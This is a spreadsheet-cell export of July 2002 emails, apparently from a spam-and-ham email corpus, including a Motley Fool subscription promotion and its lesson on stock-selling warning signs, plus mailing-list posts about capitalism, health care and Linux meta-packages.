    <t>You are receiving this email because you signed up to \nreceive one of our free reports. If you would prefer \nnot to receive messages of this type, please \nunsubscribe by following the instructions at the \nbottom of this message.\n\n\nDear Investor,\n\nThank you again for requesting our free special \nreport, "The One Stock that Keeps Wall Street \nBUZZING."\n\nWe began The Motley Fool in 1993 with the idea that \ninvestors like you deserved better. \n\nBetter than Wall Street's all-too-often biased \nresearch...  Better than analysts who speak in "secret \ncodes" allowing them to hedge or spin any \nrecommendation...  and better than what passes for "full \nfinancial disclosure" in big business today.\n\nGiven a level playing field, we believe that regular \nfolks -- like us, and you -- can do quite well in the \nstock market. Why put trust in conflicted information \nfrom others when you could count on your own \nabilities, and potentially blow the pros away? \n\nMore than two million people visit our Fool.com web \nsite each month.  We spend a great deal of time at \nFool.com instructing people HOW to invest, but not so \nmuch about WHERE to invest. \n\nAnd that's why we created the Motley Fool Stock \nAdvisor.\n\nYou are cordially invited to join us as a Charter \nSubscriber to Motley Fool Stock Advisor as we focus on \nthe great companies of the U.S. stock market. \n\nIn the same, honest, no-holds-barred style that has \nmade Fool.com so popular with investors, we'll bring \nyou our best stock recommendations and other financial \ninsights to help you achieve your financial dreams.\n\nAs a Charter Subscriber, you'll get the Motley Fool \nStock Advisor newsletter delivered to your home each \nmonth -- a personal communication from us, David &amp; Tom \nGardner.  We'll tell you exactly why we believe a \nstock is poised for significant growth -- and give you \nall the facts to back that analysis up.  You'll get \nthe good, the bad and the ugly on every recommendation \nwe make -- so you can make each investing decision \nwith great confidence.\n\nOf course, there's more to our Motley Fool Stock \nAdvisor than our monthly newsletter.\n\nYou'll also receive our monthly, between-issue, e-mail \nFool Flash to help you take full advantage of breaking \nopportunities.  And you can log on anytime at the \nMotley Fool Stock Advisor subscriber-only Web site, \nfeaturing current &amp; back newsletter issues...full \nupdates on our selected stocks...Q &amp; A...and more.\n\nBest of all, you can try our Motley Fool Stock Advisor \nentirely RISK-FREE.\n\nThe Motley Fool community has always been based upon \ntrust and value -- principles we intend to continue \nhere. So we want to give you plenty of time to decide \nif our Motley Fool Stock Advisor is a valuable \ninvesting tool for you.\n\nYou can try our Motley Fool Stock Advisor for six full \nmonths 100% RISK-FREE. If we don't prove its worth to \nyou, it doesn't cost you a dime.\n\nAnd you have our word on that.\n\nSo join us now. It's going to be fun. It's going to be \nexciting. And it's going to be an enriching experience \nyou won't want to miss.\n\nTo join us, RISK-FREE, as a Charter Subscriber to \nDavid &amp; Tom Gardner's Motley Fool Stock Advisor, \nsimply click here now: \n[URL]http://www.ppi-orders.com[/URL]\n\nFoolishly yours,\n\nDavid &amp; Tom Gardner\nThe Motley Fool\n\nP.S. Click here \n[URL]http://www.ppi-orders.com[/URL]\nto check out the FREE bonuses you get when you \nsubscribe.  Special Reports; videos; online seminars -\n- all yours to enjoy and keep, even if you cancel your \ntrial subscription to our Motley Fool Stock Advisor.\n\nRemember, you have six full months to evaluate our new \nservice.  Don't like what you see, don't make the \nprofits you expect...then it doesn't cost you a dime.  \nSo this invitation is truly RISK-FREE.  Click here now \n[URL]http://www.ppi-orders.com[/URL]\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nHOW TO UNSUBSCRIBE\n\nWe hope this email message is of value to you. If \nhowever, you do not wish to receive any of our future \nmessages, please unsubscribe by going to the following \nweb address:\n\n[URL]http://www.investorplace.com[/URL] \n\n**Note if you unsubscribe by replying to this message \nplease use Unsubscribe or Remove in the subject line. \n\n\nThu Jul 25 15:39:46 2002</t>
  </si>
  <si>
    <t>http://www.ppi-orders.com http://www.ppi-orders.com http://www.ppi-orders.com http://www.investorplace.com</t>
  </si>
  <si>
    <t>To: chris arkenberg &lt;carkenbe@adobe.com&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Thu, 25 Jul 2002 15:27:36 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:27:36 -0700</t>
  </si>
  <si>
    <t>chris arkenberg wrote:\n&gt; Cheers, Adam.\n&gt; \n&gt; Perhaps people are starting to notice how profit motive drains the \n&gt; meaning out of their lives.\n\nAnd, having realized that, a lot of them are now having babies.\nI can't believe the number of friends at work who are now pregnant\nor have already just had their babies.\n\n- Joe\n\nP.S. Who said that the US was required to be number 1\nat all times??? What's so bad about 6?\n\n-- \nLeft behind the bars\nRows of Bishops' heads in jars\nAnd a bomb inside a car\nSpectacular, spectacular\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 25 Jul 2002 15:25:05 +0200</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:25:05 +0200</t>
  </si>
  <si>
    <t>Re: Gstreamer update</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote : &gt;  &gt;     More information on that slick "gstreamer-universe" thing. &gt;  &gt;     Go to this page: [URL]http://gstreamer.net[/URL] &gt;  &gt;     They seem to have declared a a package called "gstreamer-universe" as &gt;     a collection of files.  This is brilliant; what we need to do is get &gt;     someone with a Gnome2-universe and we'll be set, aye?  :) &gt;  &gt;     Isn't that a cool idea? This is called "pseudo-packages" or "meta-packages" and Debian has been using them for ages. I think Mandrake also makes these kind of empty packages. Anyway, their use has been discussed here a while back, and personally although I do agree that they can be useful at times, I don't really like them. For me it's more of an ugly "hack" than anything else, and I'd approve completely a system that would enable to install/remove entire categories of software... but not if achieved by building empty packages. Also, you can trivially do "apt-get install ", but removing all that it installed is a bit less trivial, and could be implemented in a trivial and clean fashion if using some functionality meant to do this. Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://gstreamer.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: "Adam L. Beberg" &lt;beberg@mithral.com&gt;, Tom &lt;tomwhore@slack.net&gt;\nFrom: chris arkenberg &lt;carkenbe@adobe.com&gt;\nDate: Thu, 25 Jul 2002 15:13:57 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:13:57 -0700</t>
  </si>
  <si>
    <t>"Adam L. Beberg" &lt;beberg@mithral.com&gt;, Tom &lt;tomwhore@slack.net&gt;</t>
  </si>
  <si>
    <t>Cheers, Adam.\n\nPerhaps people are starting to notice how profit motive drains the \nmeaning out of their lives. Kinda sucks to be an ant farming for the \ncorporate lords. Funny how most of the rest of the world is more and \nmore apprehensive towards American Democracy.\n\nI just went to DC for the first time. I was awestruck by the \nmonuments, the words of Thomas Jefferson, the Spirit of Democracy set \nin stone. Amazing to think that in little more than 200 years our \ngovernment could be so far removed from those honorable principles. \nAdam Smith presumed that the marketplace would regulate itself \nthrough morality, good faith, and responsibility. Corporate America \nseems to feel that those principles stand in the way of making the \nreal bucks. How much more can they co-opt and commodify? Get your \ncopyrights in quick so you can hold on to your piece of the pie. \nHealth care, public programs, pensions, social security - these are \nnow regarded as worthless unless they can turn a profit.\n\nAh, socialized medicine. Siestas. 6 week vacation leave. I hear Spain \nis nice this time of year...\n\nAt 2:35 PM -0700 7/25/02, Adam L. Beberg wrote:\n&gt;On Wed, 24 Jul 2002, Tom wrote:\n&gt;\n&gt;&gt;  "Around the world, there is a growing sense that democracy has not\n&gt;&gt;  delivered development" Sakiko Fukuda-Parr UN report author\n&gt;\n&gt;Or perhaps it is the unregulated and out of control capitalism used as a\n&gt;tool to concentrate wealth and form a greed-based society?\n&gt;\n&gt;I notice the top 5 have a good amount of socialism in their systems to\n&gt;regulate the capitalism, especially in things like health care and\n&gt;education.\n&gt;\n&gt;Just look at our health care - no insurance = no care. Or education - gimme\n&gt;my voucher so I can get my kids out of the system while their IQ is still\n&gt;over 20.\n&gt;\n&gt;South American countries are currently figuring out just where this\n&gt;greed-based system ends up, and are looking for a way out.\n&gt;\n&gt;It was a fun ride tho wasnt it?\n&gt;\n&gt;- Adam L. "Duncan" Beberg\n&gt;   [URL]http://www.mithral.com[/URL]\n&gt;   beberg@mithral.com\n&gt;\n&gt;\n&gt;[URL]http://xent.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.mithral.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: Tom &lt;tomwhore@slack.net&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Thu, 25 Jul 2002 14:35:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 14:35:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Wed, 24 Jul 2002, Tom wrote:\n\n&gt; "Around the world, there is a growing sense that democracy has not\n&gt; delivered development" Sakiko Fukuda-Parr UN report author\n\nOr perhaps it is the unregulated and out of control capitalism used as a\ntool to concentrate wealth and form a greed-based society?\n\nI notice the top 5 have a good amount of socialism in their systems to\nregulate the capitalism, especially in things like health care and\neducation.\n\nJust look at our health care - no insurance = no care. Or education - gimme\nmy voucher so I can get my kids out of the system while their IQ is still\nover 20.\n\nSouth American countries are currently figuring out just where this\ngreed-based system ends up, and are looking for a way out.\n\nIt was a fun ride tho wasnt it?\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: xxxxxx.yyyyyyyyyy@ruhr-uni-bochum.de\nFrom: The Motley Fool &lt;Fool@MotleyFool.com&gt;\nDate: Thu, 25 Jul 2002 14:16:03 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 14:16:03 -0400</t>
  </si>
  <si>
    <t>The Motley Fool &lt;Fool@MotleyFool.com&gt;</t>
  </si>
  <si>
    <t>When to Sell Online Seminar, Lesson 2: Companies Gone Wrong</t>
  </si>
  <si>
    <t>*******************************************************************  IF YOU ARE READING THIS, YOU MAY NOT HAVE A MIME VERSION 1.0 COMPATIBLE MAIL READER. TO CONVERT YOUR SUBSCRIPTION TO PLAIN TEXT OR TO UNSUBSCRIBE, SEND AN EMAIL TO otto@fool.com OR VISIT [URL]http://www.fool.com[/URL] ******************************************************************* --Groovy-Foolish-Boundary-2A6F4DA4EE1F4ABCB782 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline =================================================================                  THE MOTLEY FOOL ONLINE SEMINAR            WHEN TO SELL: THE FOOLISH SELLING STRATEGY ================================================================= SEMINAR RESOURCES ================================================================= START PAGE [URL]http://www.fool.com[/URL] ORIENTATION [URL]http://www.fool.com[/URL] DOWNLOADS [URL]http://www.fool.com[/URL] LESSON RESOURCES [URL]http://www.fool.com[/URL] DISCUSSION BOARD INTRO [URL]http://www.fool.com[/URL] DISCUSSION BOARD FAQ [URL]http://www.fool.com[/URL] HOW DO I...? [URL]http://www.fool.com[/URL] CHOOSE YOUR TEAM [URL]http://www.fool.com[/URL] ================================================================= LESSON 2: COMPANIES GONE WRONG Instructors: Bill Mann, TMF Otter (with Matt Richey, TMF Matt) [URL]http://www.fool.com[/URL] [URL]http://www.fool.com[/URL] In Lesson 1, we offered a list of red flags that trigger instant sales. These things are pretty easy to spot, if you keep up with current events surrounding the companies you hold. Notice that we didn't spend much (meaning any) time discussing Wall Street analyst upgrades or downgrades. This is for one reason: We don't care what analysts think, and we certainly don't put any credence in their deeply compromised ratings systems. Sure, we read analyst research. After all, many analysts have significantly more access to business management than we ever will as individual investors, so they can have some valuable insights. But if you want to watch a much better predictor of company trouble than analyst rating systems, watch the bond market (more on this later). "Strong buy?" Pfffffft. In this lesson, we look specifically at signs that a company is slipping. Investors need to remember one key point: For highly valued companies, it only takes a small slip to lead to a large share price decline. For example, a company priced at a multiple of 30 times earnings is expected to grow faster than one that is priced at 15 times. As a result, investors in the high-multiple company are much more likely to be traumatized if its business starts to show slowing growth (in earnings, sales, cash flows, whatever). Thus, with highly valued companies in particular, it's important to be vigilant in monitoring any slips. Even a company that's growing nicely may be sending clear sell signals. So let's look at a few instances where companies have started to go wrong. Our goal here is to learn how to recognize the warning signs of an impending stock collapse before it happens. WARNING SIGN 1: SLOWING SALES GROWTH Through 2000, Nokia (NYSE: NOK) could do no wrong. It was one of the fastest-growing stocks in the '90s and the largest, best capitalized participant in one of the hottest sectors of the market: wireless telecommunications. In 2000, Nokia posted revenue gains well in excess of 50% each quarter. Then, in April 2001, it hit a clunker -- 22% growth, followed by 5% growth the next quarter. For investors in a high-multiple (high P/E) company, this is rough. For most companies, a second quarter in a row of dramatically slowing sales is enough. Get out. For a barnburner like Nokia, one is enough. Some words of wisdom: Keep companies in one of the hottest sectors on a very short leash. Hot sectors cool off -- they always do. Remember, railroads were once the hot sector, then canals, car companies, radios, and so on. It ends. Be ready. If you're expecting sales to continue roaring full-steam ahead and they don't, it's time to position your finger on the sell trigger. If sales growth slows unexpectedly, be prepared to give a company one quarter to bring up its performance. But unload on the second straight quarter of slowing sales, measured on a year-over-year basis. (Always compare the quarterly growth on a year-over-year basis -- a comparison of sequential quarterly growth is a worthless measure. Seasonal effects can skew sequential growth.) WARNING SIGN 2: DIVERGENT SALES AND PROFIT GROWTH By April 2001, Nokia had shed some 60% of its peak value. Signs were surely evident in advance, right? Why, yes. Companies growing top lines (sales) should generally be growing bottom lines (earnings) at a similar clip. Even though Nokia's sales were growing through 2000 at 50%-plus per quarter, at the end of the year, net profit growth dropped suddenly from around 70% to 40%. Profits recovered slightly in the fourth quarter, only to collapse in the first two quarters of 2001. The economics changed quickly, and with a hyper-growth company, the stock reacted just as fast. Even those not deeply versed in the technology and economics of the mobile phone industry could see signs that something was wrong. WARNING SIGN 3: PLUMMETING CASH FLOWS In 1999, Lucent (NYSE: LU) looked beautiful from an earnings perspective, but horrible from a cash flow perspective. We look at two numbers: operating cash flow and free cash flow. Free cash flow can be low for growing companies, as they have significant capital investment demands, but low operating cash flow is inexcusable. Lucent's experiences are telling. In 1999, Lucent's full-year earnings came out at a gaudy $4.7 billion, based upon $38 billion in revenue. The company was on top of the world, and it was, at the time, the largest telecommunications equipment company by market cap, at $260 billion. [URL]http://www.fool.com[/URL] [URL]http://www.fool.com[/URL] But as Matt and I detailed in January 2000, big troubles were afoot, lurking in the company's cash flow statement. On an operating cash flow basis for fiscal 1999, the company lost $276 million. That's a far cry from the $4.7 billion in reported net income. And on top of that, Lucent had more than $2.2 billion in capital expenditures. Thus, the difference between Lucent's earnings and its free cash flow (operating cash flow minus capital expenditures) was an amazing $7.3 billion, and not in a good way. [URL]http://www.fool.com[/URL] The investor who picked up on this scary dichotomy could have saved herself losses in excess of 98%. (As an aside, since 1999, Lucent has gone on to restate its 1999 cash flow not once, but twice, and in the most recent 10-K, the 1999 operating cash flow is reported as a loss of $1.8 billion.) And get this -- you'll see nearly the exact same thing on Enron's old financial statements. Cooked books or no, they weren't generating much cash. In fact, they were destroying it. WARNING SIGN 4: WATCH THOSE BONDS Remember what we said about ignoring analysts? Well, it's because their information can be quite conflicted, and it's almost impossible to tell if any one individual has your best interests in mind. Fortunately, another group can give you the same type of signals: investors who hold a company's bonds. Bondholders buy a piece of a company's debt and are generally paid interest on this obligation by the company. Watch the current price of a bond, and it will tell you the current odds bondholders are giving to that obligation being paid. I recommend keeping a log sheet where you write down the price of the bond. Download it here. If you see a drop, the bondholders are growing pessimistic. You might even see this at the same time analysts are shouting, "Strong buy!" [URL]http://www.fool.com[/URL] [URL]http://www.fool.com[/URL] I recommend the Yahoo! Bond Center. You can search on any company and get a list of existing bonds. Find a bond with a maturity between five and 10 years hence. Check the price. A bond priced at 100 is at "par," which means that the bond's face-value interest rate fairly compensates the investor for the risk. Some bonds are priced above 100, meaning the interest yield will be lower than face value. These are considered to be very low risk. But some are priced below face value, even way below. [URL]http://www.lnksrv.com[/URL] As of this writing, WorldCom (Nasdaq: WCOME) bonds are priced at 18, which means that bondholders assume there's little chance they'll be paid. Tyco (NYSE: TYC), for all of its recent problems and high levels of debt, has 6.75% interest bonds, with 2011 maturity priced at 83. That's a discount to face, but not one that alludes to an imminent default. Qwest (NYSE: Q) sports a price of 85 on its 7.25% 2011 bonds, even closer to par than Tyco. These prices don't indicate healthy companies, but they don't insinuate imminent default or bankruptcy either. WARNING SIGN 5: "IT JUST DOESN'T GET ANY BETTER" For a brief time in 2000, Cisco Systems (Nasdaq: CSCO) was the largest company in the world by market capitalization. This should have been a warning. As I wrote in May 2000 when the stock was around $57, Cisco's valuation of nearly $400 billion implied that investors expected the company's earnings to reach $34 billion in 2010. Yet no company had ever generated earnings higher than $12 billion in a single year. [URL]http://www.fool.com[/URL] As it turned out, I almost perfectly called the top for Cisco -- it has shed nearly $300 billion in market cap since that article. Only those that decided it couldn't possibly get any better achieved a sale near the high watermark. Cisco showed no signs of a decline. For the quarter that ended Jan. 29, 2000, Cisco turned in sales of $4.3 billion, as compared to $2.8 billion for the same quarter the year before -- a growth rate of 53%. The following quarter was 58% higher, then 62% higher, then 66% higher. Only Cisco's stock price rise could beat these numbers. Imagine a $385 billion company with a P/E of 156! The assumptions for future growth were mind-bending, though at the time, in the midst of the data revolution, they seemed plausible. As investors, we must be on the correct side of probabilities. Taking a portion of our Cisco investment off the table, at this point, would've been a smart choice. Remember, Cisco's business was fine in 2000, but the enterprising investor knows that a lot has to be right for the situation to work out. HOMEWORK For this lesson, we ask you to do the same thing as we did after Lesson 1. Pick a company -- maybe even the same company you looked at last time -- to continue studying. For your company, do the following: - Track the year-over-year sales growth for each of the past four   quarters and three fiscal years. Is growth accelerating,   staying about the same, or weakening? - Track the year-over-year net income growth for each of the past   four quarters and three fiscal years. Is net income growing   slower or faster than sales? Is there a trend to these figures? - Track your company's operating cash flow for each of the past   three fiscal years. Is it lower or higher than reported net   income for the corresponding year? (We're not having you look   at quarterly cash flow because those figures can bounce around   due to the timing of payments. Annual cash flow data is much   more indicative of real cash flow trends.) - If your company has long-term debt, go the Yahoo! Bond Center   and check the price of your company's bonds. (If you don't know   whether your company has any debt, just type your company name   into the bond center and see if any debt shows up.)   [URL]http://www.lnksrv.com[/URL] - Finally, examine your company's market cap relative to its   current net income over the past year. What's the P/E ratio? Is   there reason to believe your company has every rosy scenario   already priced into its stock? (In the current bear market,   this is much less likely than it was a few years ago, but it's   still a question you should consider.) To help you out, we've put together the Foolish Stock Information Form to track all of your research and information about your stocks. You can get to by clicking here. We've also outlined how to find all of the information above, here. [URL]http://www.fool.com[/URL] [URL]http://www.fool.com[/URL] So dust off the old calculator, find your company's financials, and get to work. Quarterly financial data is best found in company 10-Qs, and annual data is best found in company 10-Ks. You should be able to find all of this information using financials from either the company website or at Fool.com on the Quotes &amp; Data area. [URL]http://www.fool.com[/URL] FEELING A LITTLE LOST? If you're new to using SEC filings, read this overview of financial statements. Above all else, just do your best. Once you've done what you can, report your findings to your teammates! We've also put together an ongoing list of resources so you can dive in a little deeper. You can click on the "Lesson Resources" link in the right column or click here to find more resources to help you better understand financial statements, general investing equations, and stock options. [URL]http://www.fool.com[/URL] [URL]http://www.fool.com[/URL] Matt and I will be joining you on the boards with our own analyses, so you can examine our processes. [URL]http://www.fool.com[/URL] Fool on! Bill and Matt ================================================================= LESSON PLAN ================================================================= Lesson 1: On Selling [URL]http://www.fool.com[/URL] Lesson 2: Companies Gone Wrong [URL]http://www.fool.com[/URL] Lesson 3: Gut Checks and Safety Valves Lesson 4: When a Company Becomes Overvalued Lesson 5: Report Card Part 1 - Business Prospects Lesson 6: Report Card Part 2 - Valuation Lesson 7: Panning for Panera Lesson 8: The Report in Action - Johnson &amp; Johnson ================================================================= This Seminar contains the opinions and ideas of The Motley Fool. It is provided with the understanding that The Motley Fool is not engaged in rendering financial or other professional services. The Motley Fool specifically disclaims any responsibility for any liability, loss, or risk, personal or otherwise, which is incurred as a consequence, directly or indirectly, of the use and application of any of the contents of this Seminar. Copyright (c) 1995-2002 The Motley Fool. All rights reserved. Legal Information: [URL]http://www.fool.com[/URL] --Groovy-Foolish-Boundary-2A6F4DA4EE1F4ABCB782 Content-Type: text/html Content-Disposition: inline The Motley Fool Online Seminar: When To Sell: The Foolish Selling Strategy Lesson 2: Companies Gone Wrong Instructors: Bill Mann, TMF Otter (with Matt Richey, TMF Matt) In Lesson 1, we offered a list of red flags that trigger instant sales. These things are pretty easy to spot, if you keep up with current events surrounding the companies you hold. Notice that we didn't spend much (meaning any) time discussing Wall Street analyst upgrades or downgrades. This is for one reason: We don't care what analysts think, and we certainly don't put any credence in their deeply compromised ratings systems. Sure, we read analyst research. After all, many analysts have significantly more access to business management than we ever will as individual investors, so they can have some valuable insights. But if you want to watch a much better predictor of company trouble than analyst rating systems, watch the bond market (more on this later). "Strong buy?" Pfffffft. In this lesson, we look specifically at signs that a company is slipping. Investors need to remember one key point: For highly valued companies, it only takes a small slip to lead to a large share price decline. For example, a company priced at a multiple of 30 times earnings is expected to grow faster than one that is priced at 15 times. As a result, investors in the high-multiple company are much more likely to be traumatized if its business starts to show slowing growth (in earnings, sales, cash flows, whatever). Thus, with highly valued companies in particular, it's important to be vigilant in monitoring any slips. Even a company that's growing nicely may be sending clear sell signals. So let's look at a few instances where companies have started to go wrong. Our goal here is to learn how to recognize the warning signs of an impending stock collapse before it happens. Warning sign 1: Slowing sales growth Through 2000, Nokia (NYSE: NOK) could do no wrong. It was one of the fastest-growing stocks in the '90s and the largest, best capitalized participant in one of the hottest sectors of the market: wireless telecommunications. In 2000, Nokia posted revenue gains well in excess of 50% each quarter. Then, in April 2001, it hit a clunker -- 22% growth, followed by 5% growth the next quarter. For investors in a high-multiple (high P/E) company, this is rough. For most companies, a second quarter in a row of dramatically slowing sales is enough. Get out. For a barnburner like Nokia, one is enough. Some words of wisdom: Keep companies in one of the hottest sectors on a very short leash. Hot sectors cool off -- they always do. Remember, railroads were once the hot sector, then canals, car companies, radios, and so on. It ends. Be ready. If you're expecting sales to continue roaring full-steam ahead and they don't, it's time to position your finger on the sell trigger. If sales growth slows unexpectedly, be prepared to give a company one quarter to bring up its performance. But unload on the second straight quarter of slowing sales, measured on a year-over-year basis. (Always compare the quarterly growth on a year-over-year basis -- a comparison of sequential quarterly growth is a worthless measure. Seasonal effects can skew sequential growth.) Warning sign 2: Divergent sales and profit growth By April 2001, Nokia had shed some 60% of its peak value. Signs were surely evident in advance, right? Why, yes. Companies growing top lines (sales) should generally be growing bottom lines (earnings) at a similar clip. Even though Nokia's sales were growing through 2000 at 50%-plus per quarter, at the end of the year, net profit growth dropped suddenly from around 70% to 40%. Profits recovered slightly in the fourth quarter, only to collapse in the first two quarters of 2001. The economics changed quickly, and with a hyper-growth company, the stock reacted just as fast. Even those not deeply versed in the technology and economics of the mobile phone industry could see signs that something was wrong.  Warning sign 3: Plummeting cash flowsIn 1999, Lucent (NYSE: LU) looked beautiful from an earnings perspective, but horrible from a cash flow perspective. We look at two numbers: operating cash flow and free cash flow. Free cash flow can be low for growing companies, as they have significant capital investment demands, but low operating cash flow is inexcusable. Lucent's experiences are telling. In 1999, Lucent's full-year earnings came out at a gaudy $4.7 billion, based upon $38 billion in revenue. The company was on top of the world, and it was, at the time, the largest telecommunications equipment company by market cap, at $260 billion. But as Matt and I detailed in January 2000, big troubles were afoot, lurking in the company's cash flow statement. On an operating cash flow basis for fiscal 1999, the company lost $276 million. That's a far cry from the $4.7 billion in reported net income. And on top of that, Lucent had more than $2.2 billion in capital expenditures. Thus, the difference between Lucent's earnings and its free cash flow (operating cash flow minus capital expenditures) was an amazing $7.3 billion, and not in a good way. The investor who picked up on this scary dichotomy could have saved herself losses in excess of 98%. (As an aside, since 1999, Lucent has gone on to restate its 1999 cash flow not once, but twice, and in the most recent 10-K, the 1999 operating cash flow is reported as a loss of $1.8 billion.) And get this -- you'll see nearly the exact same thing on Enron's old financial statements. Cooked books or no, they weren't generating much cash. In fact, they were destroying it. Warning sign 4: Watch those bonds Remember what we said about ignoring analysts? Well, it's because their information can be quite conflicted, and it's almost impossible to tell if any one individual has your best interests in mind. Fortunately, another group can give you the same type of signals: investors who hold a company's bonds. Bondholders buy a piece of a company's debt and are generally paid interest on this obligation by the company. Watch the current price of a bond, and it will tell you the current odds bondholders are giving to that obligation being paid. I recommend keeping a log sheet where you write down the price of the bond. Download it here. If you see a drop, the bondholders are growing pessimistic. You might even see this at the same time analysts are shouting, "Strong buy!" I recommend the Yahoo! Bond Center. You can search on any company and get a list of existing bonds. Find a bond with a maturity between five and 10 years hence. Check the price. A bond priced at 100 is at "par," which means that the bond's face-value interest rate fairly compensates the investor for the risk. Some bonds are priced above 100, meaning the interest yield will be lower than face value. These are considered to be very low risk. But some are priced below face value, even way below. As of this writing, WorldCom (Nasdaq: WCOME) bonds are priced at 18, which means that bondholders assume there's little chance they'll be paid. Tyco (NYSE: TYC), for all of its recent problems and high levels of debt, has 6.75% interest bonds, with 2011 maturity priced at 83. That's a discount to face, but not one that alludes to an imminent default. Qwest (NYSE: Q) sports a price of 85 on its 7.25% 2011 bonds, even closer to par than Tyco. These prices don't indicate healthy companies, but they don't insinuate imminent default or bankruptcy either. Warning sign 5: "It just doesn't get any better" For a brief time in 2000, Cisco Systems (Nasdaq: CSCO) was the largest company in the world by market capitalization. This should have been a warning. As I wrote in May 2000 when the stock was around $57, Cisco's valuation of nearly $400 billion implied that investors expected the company's earnings to reach $34 billion in 2010. Yet no company had ever generated earnings higher than $12 billion in a single year. As it turned out, I almost perfectly called the top for Cisco -- it has shed nearly $300 billion in market cap since that article. Only those that decided it couldn't possibly get any better achieved a sale near the high watermark. Cisco showed no signs of a decline. For the quarter that ended Jan. 29, 2000, Cisco turned in sales of $4.3 billion, as compared to $2.8 billion for the same quarter the year before -- a growth rate of 53%. The following quarter was 58% higher, then 62% higher, then 66% higher. Only Cisco's stock price rise could beat these numbers. Imagine a $385 billion company with a P/E of 156! The assumptions for future growth were mind-bending, though at the time, in the midst of the data revolution, they seemed plausible. As investors, we must be on the correct side of probabilities. Taking a portion of our Cisco investment off the table, at this point, would've been a smart choice. Remember, Cisco's business was fine in 2000, but the enterprising investor knows that a lot has to be right for the situation to work out. HomeworkFor this lesson, we ask you to do the same thing as we did after Lesson 1. Pick a company -- maybe even the same company you looked at last time -- to continue studying. For your company, do the following: Track the year-over-year sales growth for each of the past four quarters and three fiscal years. Is growth accelerating, staying about the same, or weakening? Track the year-over-year net income growth for each of the past four quarters and three fiscal years. Is net income growing slower or faster than sales? Is there a trend to these figures? Track your company's operating cash flow for each of the past three fiscal years. Is it lower or higher than reported net income for the corresponding year? (We're not having you look at quarterly cash flow because those figures can bounce around due to the timing of payments. Annual cash flow data is much more indicative of real cash flow trends.) If your company has long-term debt, go the Yahoo! Bond Center and check the price of your company's bonds. (If you don't know whether your company has any debt, just type your company name into the bond center and see if any debt shows up.) Finally, examine your company's market cap relative to its current net income over the past year. What's the P/E ratio? Is there reason to believe your company has every rosy scenario already priced into its stock? (In the current bear market, this is much less likely than it was a few years ago, but it's still a question you should consider.)  To help you out, we've put together the Foolish Stock Information Form to track all of your research and information about your stocks. You can get to by clicking here. We've also outlined how to find all of the information above, here. So dust off the old calculator, find your company's financials, and get to work. Quarterly financial data is best found in company 10-Qs, and annual data is best found in company 10-Ks. You should be able to find all of this information using financials from either the company website or at Fool.com on the Quotes &amp; Data area.  Feeling a little lost?If you're new to using SEC filings, read this overview of financial statements. Above all else, just do your best. Once you've done what you can, report your findings to your teammates! We've also put together an ongoing list of resources so you can dive in a little deeper. You can click on the "Lesson Resources" link in the right column or click here to find more resources to help you better understand financial statements, general investing equations, and stock options. Matt and I will be joining you on the boards with our own analyses, so you can examine our processes. Fool on! Bill and Matt In case you missed this week's earlier announcement, please note that there is a correction to Lesson 1. The fifth automatic sell rule regarding stock option grants should read: We set 3% as our maximum for developed companies, 5% for developing ones (use $500 million in sales as a rough boundary between the two). You can read the correct lesson in its entirety by clicking on "Lesson 1" below. If you have any questions, hit your team board and ask away! Lesson 1: On Selling Lesson 2: Companies Gone Wrong Lesson 3: Gut Checks and Safety Valves Lesson 4: When a Company Becomes Overvalued Lesson 5: Report Card Part 1 - Business Prospects Lesson 6: Report Card Part 2 - Valuation Lesson 7: Panning for Panera Lesson 8: The Report in Action - Johnson &amp; Johnson Start Page Orientation Downloads Lesson Resources Discussion Board Intro Discussion Board FAQ How Do I...? Choose Your Team Operating Cash Flow Free cash flow Lessons from Lucent Log Sheet Yahoo! Bond Center Do Big-Cap Tech Stocks Mean Big Risk? Overview of Financial Statements 							This Seminar contains the opinions and ideas of The Motley Fool. It is provided with the understanding that The Motley Fool is not engaged in rendering financial or other professional services. The Motley Fool specifically disclaims any responsibility for any liability, loss, or risk, personal or otherwise, which is incurred as a consequence, directly or indirectly, of the use and application of any of the contents of this Seminar. Legal Information. Copyright  1995-2002 The Motley Fool. All rights reserved. 							 --Groovy-Foolish-Boundary-2A6F4DA4EE1F4ABCB782--</t>
  </si>
  <si>
    <t>http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.lnksrv.com http://www.fool.com http://www.lnksrv.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com</t>
  </si>
  <si>
    <t>To: SWEEPS_REMINDERS@lifetimetv.com\nFrom: ltonline@lifetimetv.com\nDate: Thu, 25 Jul 2002 13:43:15 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 13:43:15 -0400</t>
  </si>
  <si>
    <t>ltonline@lifetimetv.com</t>
  </si>
